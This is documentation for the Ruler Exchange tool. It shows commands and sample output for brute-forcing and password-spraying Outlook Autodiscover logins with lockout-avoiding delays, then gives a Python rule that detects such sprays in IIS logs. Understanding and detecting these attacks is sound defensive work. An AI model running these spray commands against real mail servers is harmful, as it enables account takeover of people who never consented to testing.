Brute Force
While Ruler makes a best effort to "autodiscover" the necessary settings, you may still run into instances of it failing. The common causes are:
- Autodiscover deployed over HTTP rather than HTTPS (Ruler defaults to HTTPS, as this is more common)
- No Autodiscover DNS record
- Authentication failing
If you encounter an Exchange server where the Autodiscover service is failing, you can manually specify the Autodiscover URL:
```
./ruler --url http://autodiscover.somedomain.com/autodiscover/autodiscover.xml
```
If you run into issues with authentication (and you know the creds are correct), you can force the use of basic authentication with the global --basic flag.
The global --verbose flag will also give you some insight into the process being used by the autodiscover service.
Another thing to note is that Ruler doesn't require --domain for authentication or autodiscover in most cases: the autodiscover service works off the email address's domain. If you find that authentication is failing, it might mean that the internal domain name is required as part of the authentication string. For this, add --domain DOMAIN to your requests. This ensures that NTLM auth sends DOMAIN\USERNAME in the authentication sequence instead of .\USERNAME.
Basic rule: use --domain with brute (Ruler uses it to figure out the Autodiscover URL); otherwise leave it off.
If you go the brute-force route, Ruler is your friend. It has a built-in brute-forcer which does a semi-decent job of finding creds.
```
./ruler --domain targetdomain.com brute --users /path/to/user.txt --passwords /path/to/passwords.txt
```
You should see your brute-force in action:
```
./ruler --domain evilcorp.ninja --insecure brute --users ~/users.txt --passwords ~/passwords.txt --delay 0 --verbose
[*] Starting bruteforce
[x] Failed: cindy.baker:P@ssw0rd
[x] Failed: henry.hammond:P@ssw0rd
[x] Failed: john.ford:P@ssw0rd
[x] Failed: cindy.baker:August2016
[x] Failed: henry.hammond:August2016
[+] Success: john.ford:August2016
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: cindy.baker:Evilcorp@2016
[x] Failed: henry.hammond:Evilcorp@2016
[x] Failed: cindy.baker:3V1lc0rp
[x] Failed: henry.hammond:3V1lc0rp
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: henry.hammond:Password1
[+] Success: cindy.baker:Password1
```
Alternatively, you can specify a userpass file with the --userpass option. The userpass file should be colon-delimited with one pair of credentials per line:
```
$ cat userpass.txt
john.ford:August2016
henry.hammond:Password!2016
cindy.baker:Password1
```

```
./ruler --domain evilcorp.ninja --insecure brute --userpass userpass.txt -v
[*] Starting bruteforce
[+] Success: john.ford:August2016
[x] Failed: henry.hammond:Password!2016
[+] Success: cindy.baker:Password1
```
A few other flags work with brute. These are:
- --stop // stop on the first valid username:password combo
- --delay // how long to wait between batches of password guesses
- --attempts // how many attempts before we delay (attempts per user)
- --insecure // if the Exchange server has a bad SSL certificate
- --verbose // be verbose and show failed attempts
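The run shown above, and the --attempts/--delay flags, describe a password spray: each password is tried against every user before the next one, so no single account crosses a lockout threshold. From the defender's side the pattern is still visible, because one source address fails authentication against many distinct accounts in a short window. The following Python rule, added here as an example and not code from the Ruler project, finds that pattern in IIS W3C logs for the Autodiscover endpoint. The log lines are constructed, the field subset (date, time, c-ip, cs-username, cs-uri-stem, sc-status) is an assumption, and whether cs-username is populated on a failed attempt depends on the auth method and IIS logging configuration.

```python
"""Spot an Autodiscover password spray in IIS W3C logs (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, not real log data. Field order follows the "#Fields"
# header; only the fields this rule needs are included. Assumption: IIS
# recorded cs-username on the failed (401) attempts.
SAMPLE_IIS_LOG = r"""
#Fields: date time c-ip cs-username cs-uri-stem sc-status
2016-08-01 10:00:01 203.0.113.5 EVILCORP\cindy.baker /autodiscover/autodiscover.xml 401
2016-08-01 10:00:02 203.0.113.5 EVILCORP\henry.hammond /autodiscover/autodiscover.xml 401
2016-08-01 10:00:03 203.0.113.5 EVILCORP\john.ford /autodiscover/autodiscover.xml 401
2016-08-01 10:00:04 203.0.113.5 EVILCORP\cindy.baker /autodiscover/autodiscover.xml 401
2016-08-01 10:00:05 203.0.113.5 EVILCORP\henry.hammond /autodiscover/autodiscover.xml 401
2016-08-01 10:00:06 203.0.113.5 EVILCORP\john.ford /autodiscover/autodiscover.xml 200
2016-08-01 10:00:07 198.51.100.7 - /autodiscover/autodiscover.xml 401
2016-08-01 10:00:07 198.51.100.7 EVILCORP\alice.smith /autodiscover/autodiscover.xml 200
2016-08-01 10:00:09 198.51.100.9 EVILCORP\bob.jones /owa/ 401
"""

AUTODISCOVER_PATH = "/autodiscover/autodiscover.xml"


def normalise_user(raw):
    """Reduce 'DOMAIN\\user', 'user@domain' or 'user' to lowercase 'user'."""
    if raw == "-":
        return None  # IIS logs '-' when no credential was presented
    user = raw.rsplit("\\", 1)[-1]  # drop DOMAIN\ prefix (NTLM style)
    user = user.split("@", 1)[0]     # drop @domain suffix (UPN style)
    return user.lower()


def parse_iis_log(text):
    """Return one dict per data line, skipping '#' directives and blanks."""
    events = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        date, time, ip, user, uri, status = line.split()
        events.append({
            "ts": datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S"),
            "ip": ip,
            "user": normalise_user(user),
            "uri": uri.lower(),
            "status": int(status),
        })
    return events


def detect_spray(text, window=timedelta(minutes=10), min_users=3):
    """One alert per source IP that failed Autodiscover auth for at least
    `min_users` distinct accounts inside any span of length `window`."""
    by_ip = defaultdict(list)
    for ev in parse_iis_log(text):
        if ev["uri"].endswith(AUTODISCOVER_PATH):
            by_ip[ev["ip"]].append(ev)

    alerts = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        # Only 401s that carried a username count as guesses; the bare 401
        # challenge of a normal NTLM handshake has no user and is ignored.
        failures = [e for e in events if e["status"] == 401 and e["user"]]
        widest = set()
        for i, first in enumerate(failures):
            users = {e["user"] for e in failures[i:]
                     if e["ts"] - first["ts"] <= window}
            if len(users) > len(widest):
                widest = users
        if len(widest) >= min_users:
            # A 200 from the same source is the account to triage first:
            # that is the credential the spray found.
            successes = sorted({e["user"] for e in events
                                if e["status"] == 200 and e["user"]})
            alerts.append({
                "ip": ip,
                "distinct_failed_users": sorted(widest),
                "successes": successes,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_IIS_LOG):
        print(f"[!] {alert['ip']} sprayed {len(alert['distinct_failed_users'])} "
              f"accounts; successful logons: {alert['successes'] or 'none'}")
```

The rule keys on distinct accounts per source rather than failures per account, which is exactly the dimension a --delay/--attempts-paced spray does not control. The legitimate client in the sample (one 401 challenge with no username, then a 200) is not flagged, and the threshold and window are parameters so they can be tuned to the size of the user base.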